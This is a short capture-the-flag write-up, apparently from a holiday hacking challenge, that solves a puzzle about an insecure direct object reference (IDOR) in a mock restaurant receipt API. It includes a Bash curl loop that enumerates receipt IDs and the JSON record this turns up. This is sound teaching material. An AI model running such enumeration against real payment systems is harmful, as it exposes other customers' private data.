I’m Josh Wright - teetotal, run on about 4 hours’ sleep, and into pre-1900 photography. Teaching hacking and defense is my thing.
A gnome slipped through Sasabune pretending to be human - asking for frozen sushi (yikes). From past work on IDOR bugs in restaurant payment systems, I think a similar vulnerability is here.
Task: Use the receipt to investigate an IDOR-style flaw in the payment system and unmask the gnome.
First, we look at the bill we found behind the building, scan the QR code, and send ourselves the link.
https://its-idorable.holidayhackchallenge.com/receipt/i9j0k1l2
If we look at the request in the developer tools, for example, we can see that the data is retrieved via an API that is vulnerable to IDOR.
https://its-idorable.holidayhackchallenge.com/api/receipt?id=103
With a small Bash one-liner, we iterate over the IDs and quickly find the name of the gnome we are looking for.
for i in {1..140}; do curl https://its-idorable.holidayhackchallenge.com/api/receipt?id=$i 2>/dev/null | grep frozen ; done
{"customer":"Bartholomew Quibblefrost","date":"2025-12-20","id":139,"items":[{"name":"Frozen Roll (waitress improvised: sorbet, a hint of dry ice)","price":19.0}],"note":"Insisted on increasingly bizarre rolls and demanded one be served frozen. The waitress invented a 'Frozen Roll' on the spot with sorbet and a puff of theatrical smoke. He nodded solemnly and asked if we could make these in bulk.","paid":true,"table":14,"total":19.0}